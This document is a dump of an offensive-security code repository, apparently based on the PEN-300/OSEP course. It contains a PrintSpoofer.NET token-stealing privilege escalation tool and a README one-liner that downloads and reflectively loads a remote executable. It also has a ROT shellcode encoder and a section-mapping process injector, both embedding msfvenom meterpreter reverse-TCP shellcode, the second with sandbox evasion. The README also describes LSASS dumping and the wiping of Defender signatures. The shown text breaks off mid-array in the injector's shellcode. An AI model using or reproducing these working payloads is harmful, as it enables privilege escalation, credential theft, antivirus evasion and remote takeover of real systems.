GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {4312EA9E-E161-4B69-A14B-2377CB32213A} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /PrintSpoofer.NET/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | using System.Security.Principal; 4 | using System.Text; 5 | 6 | namespace PrintSpoofer 7 | { 8 | public class Program 9 | { 10 | public static uint PIPE_ACCESS_DUPLEX = 0x3; 11 | public static uint PIPE_TYPE_BYTE = 0x0; 12 | public static uint PIPE_WAIT = 0x0; 13 | public static uint TOKEN_ALL_ACCESS = 0xF01FF; 14 | public static uint TOKENUSER = 1; 15 | public static uint SECURITY_IMPERSONATION = 2; 16 | public static uint TOKEN_PRIMARY = 1; 17 | 18 | [StructLayout(LayoutKind.Sequential)] 19 | public struct PROCESS_INFORMATION 20 | { 21 | public IntPtr hProcess; 22 | public IntPtr hThread; 23 | public int dwProcessId; 24 | public int dwThreadId; 25 | } 26 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 27 | public struct STARTUPINFO 28 | { 29 | public Int32 cb; 30 | public string lpReserved; 31 | public string lpDesktop; 32 | public string lpTitle; 33 | public Int32 dwX; 34 | public Int32 dwY; 35 | public Int32 dwXSize; 36 | public Int32 dwYSize; 37 | public Int32 dwXCountChars; 38 | public Int32 dwYCountChars; 39 | public Int32 dwFillAttribute; 40 | public Int32 dwFlags; 41 | public Int16 wShowWindow; 42 | public Int16 cbReserved2; 43 | public IntPtr lpReserved2; 44 | public IntPtr hStdInput; 45 | public IntPtr hStdOutput; 46 | public IntPtr hStdError; 47 | } 48 | 49 | public enum CreationFlags 50 | { 51 | DefaultErrorMode = 0x04000000, 52 | NewConsole = 0x00000010, 53 | NewProcessGroup = 0x00000200, 54 | SeparateWOWVDM = 0x00000800, 55 | Suspended = 0x00000004, 56 | UnicodeEnvironment = 0x00000400, 57 | ExtendedStartupInfoPresent = 0x00080000 58 | } 59 | public enum LogonFlags 60 | { 61 | WithProfile = 1, 62 | NetCredentialsOnly 63 | } 64 | 65 | [DllImport("kernel32.dll", SetLastError = true)] 66 | static extern IntPtr CreateNamedPipe(string lpName, uint dwOpenMode, uint dwPipeMode, uint nMaxInstances, uint nOutBufferSize, uint nInBufferSize, uint nDefaultTimeOut, IntPtr lpSecurityAttributes); 67 | 68 | [DllImport("kernel32.dll")] 69 | static extern bool ConnectNamedPipe(IntPtr hNamedPipe, IntPtr lpOverlapped); 70 | 71 | [DllImport("Advapi32.dll")] 72 | static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe); 73 | 74 | [DllImport("advapi32.dll", SetLastError = true)] 75 | static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle); 76 | 77 | [DllImport("kernel32.dll")] 78 | static extern IntPtr GetCurrentThread(); 79 | 80 | [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)] 81 | public static extern bool CreateProcessWithTokenW(IntPtr hToken, LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 82 | 83 | [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] 84 | public extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken); 85 | 86 | [DllImport("advapi32.dll", SetLastError = true)] 87 | static extern bool RevertToSelf(); 88 | 89 | [DllImport("kernel32.dll")] 90 | static extern uint GetSystemDirectory([Out] StringBuilder lpBuffer, uint uSize); 91 | 92 | [DllImport("userenv.dll", SetLastError = true)] 93 | static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit); 94 | 95 | public static void Main(string[] args) 96 | { 97 | // Parse arguments (pipe name) 98 | if (args.Length != 2) 99 | { 100 | Console.WriteLine("Please enter the pipe name to be used and the binary to trigger as arguments.\nExample: .\\PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\windows\\tasks\\bin.exe"); 101 | return; 102 | } 103 | string pipeName = args[0]; 104 | string binToRun = args[1]; 105 | 106 | // Create our named pipe 107 | IntPtr hPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 10, 0x1000, 0x1000, 0, IntPtr.Zero); 108 | 109 | // Connect to our named pipe and wait for another client to connect 110 | Console.WriteLine("Waiting for client to connect to named pipe..."); 111 | bool result = ConnectNamedPipe(hPipe, IntPtr.Zero); 112 | 113 | // Impersonate the token of the incoming connection 114 | result = ImpersonateNamedPipeClient(hPipe); 115 | 116 | // Open a handle on the impersonated token 117 | IntPtr tokenHandle; 118 | result = OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, false, out tokenHandle); 119 | 120 | // Duplicate the stolen token 121 | IntPtr sysToken = IntPtr.Zero; 122 | DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, IntPtr.Zero, SECURITY_IMPERSONATION, TOKEN_PRIMARY, out sysToken); 123 | 124 | // Create an environment block for the non-interactive session 125 | IntPtr env = IntPtr.Zero; 126 | bool res = CreateEnvironmentBlock(out env, sysToken, false); 127 | 128 | // Get the impersonated identity and revert to self to ensure we have impersonation privs 129 | String name = WindowsIdentity.GetCurrent().Name; 130 | Console.WriteLine($"Impersonated user is: {name}."); 131 | RevertToSelf(); 132 | 133 | // Get the system directory 134 | StringBuilder sbSystemDir = new StringBuilder(256); 135 | uint res1 = GetSystemDirectory(sbSystemDir, 256); 136 | 137 | // Spawn a new process with the duplicated token, a desktop session, and the created profile 138 | PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION(); 139 | STARTUPINFO sInfo = new STARTUPINFO(); 140 | sInfo.cb = Marshal.SizeOf(sInfo); 141 | sInfo.lpDesktop = "WinSta0\\Default"; 142 | CreateProcessWithTokenW(sysToken, LogonFlags.WithProfile, null, binToRun, CreationFlags.UnicodeEnvironment, env, sbSystemDir.ToString(), ref sInfo, out pInfo); 143 | Console.WriteLine($"Executed '{binToRun}' with impersonated token!"); 144 | } 145 | } 146 | } -------------------------------------------------------------------------------- /PrintSpoofer.NET/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("PrintSpoofer.NET")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("PrintSpoofer.NET")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("c91c8b29-82df-49c0-986b-81182cf84e42")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSEP Code Snippets 2 | Code examples are provided as-is, without any form of warranty. Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course. 3 | 4 | Classes and methods are public, so most binaries should allow for reflective loading as below. 5 | 6 | ```powershell 7 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe') 8 | $assem = [System.Reflection.Assembly]::Load($data) 9 | [rev.Program]::Main("".Split()) 10 | ``` 11 | 12 | ### Contents 13 | |Snippet Name|Description| 14 | |--|--| 15 | | AppLocker Bypass PowerShell Runspace (C#) | Base binary for an applocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.| 16 | | Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. | 17 | |Linux Shellcode Encoder (Python) | A utility script to encode C# payloads from Linux, automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.| 18 | |Linux Shellcode Loaders (C) |Various C-based shellcode loaders, including base binaries for library hijacking.| 19 | |MiniDump (C# & PS1) |A simple binary to Dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as native PowerShell script.| 20 | |MSSQL (C#)|An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.| 21 | |PrintSpoofer.NET (C#)|Steals the token of the incoming authentication forced with the [PrintSpooler exploit](https://github.com/leechristensen/SpoolSample), and use that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.| 22 | |ROT Shellcode Encoder (C#)|A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.| 23 | |Sections Shellcode Process Injector (C#)|Injects and runs shellcode using `NtCreateSection`, `NtMapViewOfSection`, `NtUnMapViewOfsection` and `NtClose` instead of the "standard" method.| 24 | |Shellcode Process Hollowing (C#)|Hollows a `svchost` process and runs the shellcode from there. Scores 0/68 on VirusTotal at the time of writing.| 25 | |Shellcode Process Injector (C# & PS1) | Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as native PowerShell script (though it is a bit simpler).| 26 | |Simple Shellcode Runner (C# & PS1 & VBA)|The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.| 27 | |XOR Shellcode Encoder (C#)|A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.| 28 | 29 | -------------------------------------------------------------------------------- /ROT Shellcode Encoder/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ROT Shellcode Encoder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace ConsoleApp2 8 | { 9 | class Program 10 | { 11 | static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[511] { 15 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 16 | 0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b, 17 | 0x52,0x20,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9, 18 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 19 | 0x01,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48, 20 | 0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b, 21 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x44,0x8b, 22 | 0x40,0x20,0x49,0x01,0xd0,0x50,0x8b,0x48,0x18,0xe3,0x56,0x4d,0x31,0xc9,0x48, 23 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9, 24 | 0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45, 25 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b, 26 | 0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01, 27 | 0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48, 28 | 0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9, 29 | 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00, 30 | 0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5, 31 | 0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4, 32 | 0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68, 33 | 0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a, 34 | 0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89, 35 | 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5, 36 | 0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba, 37 | 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5, 38 | 0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9, 39 | 0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 40 | 0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41, 41 | 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41, 42 | 0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31, 43 | 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8, 44 | 0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40, 45 | 0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5, 46 | 0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c, 47 | 0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41, 48 | 0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff, 49 | 0xd5 }; 50 | 51 | if (args.Length == 0) 52 | { 53 | System.Console.WriteLine("Please enter a numeric argument for the number of rotations."); 54 | return; 55 | } 56 | 57 | int rotNo = int.Parse(args[0]); 58 | 59 | // Encode the payload with rotation 60 | byte[] encoded = new byte[buf.Length]; 61 | for (int i = 0; i < buf.Length; i++) 62 | { 63 | encoded[i] = (byte)(((uint)buf[i] + rotNo) & 0xFF); 64 | } 65 | 66 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 67 | int totalCount = encoded.Length; 68 | for (int count = 0; count < totalCount; count++) 69 | { 70 | byte b = encoded[count]; 71 | 72 | if ((count + 1) == totalCount) // Dont append comma for last item 73 | { 74 | hex.AppendFormat("0x{0:x2}", b); 75 | } 76 | else 77 | { 78 | hex.AppendFormat("0x{0:x2}, ", b); 79 | } 80 | } 81 | 82 | Console.WriteLine($"ROT{rotNo} payload:"); 83 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{ {hex} }};"); 84 | 85 | //// Decode the ROTxx payload (make sure to change rotations) 86 | // for (int i = 0; i < buf.Length; i++) 87 | // { 88 | // buf[i] = (byte)(((uint)buf[i] - 37) & 0xFF); 89 | //} 90 | 91 | } 92 | } 93 | } -------------------------------------------------------------------------------- /ROT Shellcode Encoder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ROT Shellcode Encoder")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ROT Shellcode Encoder")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("59224c16-39c5-49ea-8525-f493dc1d66fe")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /ROT Shellcode Encoder/ROT Shellcode Encoder.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {59224C16-39C5-49EA-8525-F493DC1D66FE} 8 | Exe 9 | ROT_Shellcode_Encoder 10 | ROT Shellcode Encoder 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /ROT Shellcode Encoder/ROT Shellcode Encoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ROT Shellcode Encoder", "ROT Shellcode Encoder.csproj", "{59224C16-39C5-49EA-8525-F493DC1D66FE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {F6755004-5FA9-4677-BBB7-D8446DC21ED4} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Sections Shellcode Process Injector/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Sections Shellcode Process Injector/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace RemoteShinjectLowlevel 7 | { 8 | class Program 9 | { 10 | // FOR DEBUGGING 11 | [DllImport("kernel32.dll")] 12 | static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead); 13 | 14 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)] 15 | static extern int memcmp(byte[] b1, byte[] b2, long count); 16 | 17 | static bool ByteArrayCompare(byte[] b1, byte[] b2) 18 | { 19 | return b1.Length == b2.Length && memcmp(b1, b2, b1.Length) == 0; 20 | } 21 | // END DEBUGGING 22 | 23 | public const uint ProcessAllFlags = 0x001F0FFF; 24 | public const uint GenericAll = 0x10000000; 25 | public const uint PageReadWrite = 0x04; 26 | public const uint PageReadExecute = 0x20; 27 | public const uint PageReadWriteExecute = 0x40; 28 | public const uint SecCommit = 0x08000000; 29 | 30 | [DllImport("kernel32.dll", SetLastError = true)] 31 | public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 32 | 33 | 34 | [DllImport("ntdll.dll", SetLastError = true)] 35 | static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, 36 | UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle); 37 | 38 | [DllImport("ntdll.dll", SetLastError = true)] 39 | static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, 40 | out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect); 41 | 42 | [DllImport("ntdll.dll", SetLastError = true)] 43 | static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr); 44 | 45 | [DllImport("ntdll.dll", ExactSpelling = true, SetLastError = false)] 46 | static extern int NtClose(IntPtr hObject); 47 | 48 | [DllImport("kernel32.dll")] 49 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 50 | 51 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 52 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); 53 | 54 | [System.Runtime.InteropServices.DllImport("kernel32.dll")] 55 | static extern IntPtr GetCurrentProcess(); 56 | 57 | static void Main(string[] args) 58 | { 59 | // Sandbox evasion 60 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); 61 | if (mem == null) 62 | { 63 | return; 64 | } 65 | 66 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp 67 | // XORed with key 0xfa 68 | byte[] buf = new byte[511] { 69 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8, 70 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2, 71 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0, 72 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb, 73 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2, 74 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71, 75 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2, 76 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2, 77 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33, 78 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf, 79 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71, 80 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2, 81 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2, 82 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13, 83 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa, 84 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f, 85 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e, 86 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92, 87 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0, 88 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 89 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f, 90 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40, 91 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f, 92 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33, 93 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f, 94 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb, 95 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb, 96 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb, 97 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 98 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba, 99 | 0xfa, 0xfa, 0xbb, 